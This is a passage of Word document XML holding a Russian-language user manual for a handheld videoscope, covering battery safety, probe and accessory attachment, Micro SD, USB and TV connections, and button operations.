          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:t>Правильная полярность указана на держателе</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>батареек.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:t>Установите держатель с батарейками в отсек внутри рукоятки видеоскопа, а затем закрепите крышку отсека с помощью винта, закрутив его</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>отверткой.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00164BF4" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="70" w:name="_bookmark12"/>
      <w:bookmarkEnd w:id="70"/>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Меры предосторожности, связанные с</w:t>
      </w:r>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>батарейками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Перед чисткой видеоскопа необходимо извлечь</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>батарейки.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Если видеоскоп предполагается хранить без использования в течение длительного периода времени, необходимо извлечь батарейки из отсека, чтобы предотвратить утечку</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>электролита.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 случае необходимости замените все 4 (четыре) батарейки на</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>новые.</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Используйте батарейки только указанного размера и</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>типа.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Обязательно соблюдайте правильную полярность при установке батареек в держатель.</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Утилизируйте батарейки надлежащим образом. Чрезмерное нагревание батареек может привести к взрыву. Не подвергайте батарейки воздействию открытого огня.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00164BF4" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="_bookmark13"/>
      <w:bookmarkEnd w:id="71"/>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Подсоединение зонда и</w:t>
      </w:r>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>видеоголовки</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
          <w:tab w:val="left" w:pos="3894"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:t>Для использования видеоскопа необходимо подсоединить видеоголовку и зонд к устройству отображения информации. Во время подсоединения зонда убедитесь, что выступ и паз выровнены надлежащим образом. После их выравнивания затяните пальцами поворотный фиксатор, чтобы закрепить соединение.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00EC7BBF" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251666944" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3075940</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>202565</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1464310" cy="1133475"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="16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431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EC7BBF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Подсоединение вспомогательных</w:t>
      </w:r>
      <w:r w:rsidR="00B45DB0" w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B45DB0" w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>принадлежностей</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
          <w:tab w:val="left" w:pos="3894"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">В комплект поставки видеоскопа входят три насадки: с магнитом, крючком и зеркалом. Все насадки крепятся к видеоголовке одинаковым образом. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
          <w:tab w:val="left" w:pos="3894"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0049237E">
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1470660" cy="1120140"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2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0660" cy="1120140"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Надвиньте насадку на видеоголовку, чтобы зафиксировать их между собой.</w:t>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2C1237" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251667968" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3187700</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-37465</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1426210" cy="1092200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="16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621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tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00164BF4" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Подключение карты памяти Micro</w:t>
      </w:r>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SD</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ПРИМЕЧАНИЕ. Разъем для карты памяти Micro SD позволяет увеличить объем рабочей памяти видеоскопа. Карта памяти Micro SD является дополнительным компонентом и не входит в комплект поставки видеоскопа. В разъем для карт памяти можно вставлять карты памяти Micro SD, емкость которых не превышает 16 ГБ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
          <w:tab w:val="left" w:pos="3894"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Чтобы вставить карту памяти Micro SD в соответствующий разъем, расположите ее контакты в направлении разъема, при этом скошенный угол карты памяти должен быть направлен вниз. После подключения карты памяти Micro SD в верхней правой части экрана появится небольшой значок карты памяти Micro SD. Для извлечения карты памяти Micro SD аккуратно надавите на ее выступающий край, после чего отпустите и позвольте карте памяти высвободиться из разъема.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00EC7BBF" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="72" w:name="_bookmark16"/>
      <w:bookmarkEnd w:id="72"/>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Подключение</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>USB</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-кабеля</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00233B41"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Для подключения видеоскопа к компьютеру используется </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>USB</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">-кабель, входящий в комплект поставки. После подключения к компьютеру фотоснимки </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">и видеозаписи, полученные с помощью видеоскопа, можно просматривать на экране монитора компьютера. При этом на экране видеоскопа появится сообщение: </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>USB</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Connected</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Установлено </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>USB</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>-соединение]</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00233B41"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68992" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3048000</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>127635</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1461770" cy="1120140"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="16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177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164BF4" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="73" w:name="_bookmark17"/>
      <w:bookmarkEnd w:id="73"/>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Подключение кабеля к видеовыходу (ТВ</w:t>
      </w:r>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>разъем)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Подсоедините один конец видеокабеля к видеовыходу видеоскопа, а другой — к видеовходу телевизора, после чего на экране телевизора появится высококачественное изображение, передаваемое видеоголовкой в режиме реального времени.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00EC7BBF" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="74" w:name="_bookmark18"/>
      <w:bookmarkEnd w:id="74"/>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Указания по</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>эксплуатации</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ВАЖНО! Всегда носите защитные очки, чтобы предотвратить попадание в глаза пыли и мусора. Соблюдайте указания по эксплуатации, чтобы уменьшить вероятность травмы в результате поражения электрическим током, механических воздействий и прочих причин.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00EC7BBF" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="75" w:name="_bookmark19"/>
      <w:bookmarkEnd w:id="75"/>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Основные</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>операции</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ПРИМЕЧАНИЕ. Во время использования видеоскопа возможно изгибание зонда необходимым образом с целью упрощения проведения обследования в ограниченных пространствах.</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Возьмите видеоскоп за рукоятку так, чтобы экран ЖК-дисплея был направлен в вашу сторону. Затем нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>электропитания</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>, чтобы включить видеоскоп. После включения электропитания видеоскопа на экране появится заставка, которая через две секунды сменится рабочим экраном, используемым основную часть времени обследования.</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Нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OK</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t xml:space="preserve">, чтобы сделать фотографию в режиме фотосъемки. Нажатие кнопки </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">OK </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t xml:space="preserve">в режиме видео позволяет начать видеозапись. Кнопка </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">с изображением фото-/видеокамеры </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>позволяет переключаться между этими двумя режимами по мере</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>необходимости.</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Нажмите кнопку со стрелкой </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">вверх </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t xml:space="preserve">или </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>вниз</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>, чтобы увеличить или уменьшить изображение на экране видеоскопа в режиме фотосъемки, при этом индикатор масштаба указывает на степень увеличения или уменьшения изображения.</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Нажмите кнопку со стрелкой </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">влево </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t xml:space="preserve">или </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>вправо</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>, чтобы уменьшить или увеличить подсветку экрана в режиме фотосъемки, при этом индикатор яркости указывает на степень увеличения или уменьшения свечения</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>подсветки.</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Нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>воспроизведения</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>, чтобы просмотреть ранее сохраненные фотоснимки и</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>видеозаписи.</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>удаления/поворота</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>, чтобы удалить сохраненные фотоснимки и видеозаписи необходимым образом во время воспроизведения ранее сохраненных фотоснимков и</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>видеозаписей.</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Нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>удаления/поворота</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>, чтобы выбрать ориентацию изображения на экране видеоскопа во время фотосъемки или записи видео в режиме реального времени.</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Нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>настройки/возврата</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t xml:space="preserve">, чтобы перейти в </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">режим настройки </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>или вернуться к предыдущему</w:t>
